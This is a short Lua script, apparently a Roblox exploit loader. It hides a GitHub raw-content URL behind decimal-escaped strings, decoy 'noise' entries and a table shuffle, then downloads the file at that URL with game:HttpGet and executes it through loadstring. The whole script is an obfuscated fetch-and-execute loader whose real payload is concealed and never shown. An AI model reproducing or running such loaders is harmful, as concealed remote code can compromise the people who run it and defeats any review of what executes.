return (function(...)

    -- ========= NOISE TABLE =========
    local R = {
        "\083\120\090\077","\104\116\116\112\115\058\047\047","\051\065\099\078",
        "\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047",
        "\077\043\098\081","\108\097\114\052\055\053\053\052\054\054\045\098\105\116\047",
        "\074\065\089\083\073\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047",
        "\099\090\081\043","\074\065\089\083\073\046\076\117\110","\070\071\081\065"
    }

    for i = 1, #R * 3 do
        local a = (i * 17) % #R + 1
        local b = (i * 29) % #R + 1
        R[a], R[b] = R[b], R[a]
    end

    
    local function D(s)
        return (s:gsub("\\(%d%d?%d?)", function(n)
            return string.char((tonumber(n) + 256) % 256)
        end))
    end

    local order = {2,4,6,8,10,7,5,3}
    local URL = ""
    for _,i in ipairs(order) do
        URL = URL .. D(R[i])
    end

    
    local function noise()
        local x = 0
        for i = 1, 20 do
            x = (x + math.floor(math.sin(i) * 1000)) % 99999
        end
        return x
    end
    if noise() == -1 then return end


    local src = game:HttpGet(URL)
    return loadstring(src)(...)

end)(...)
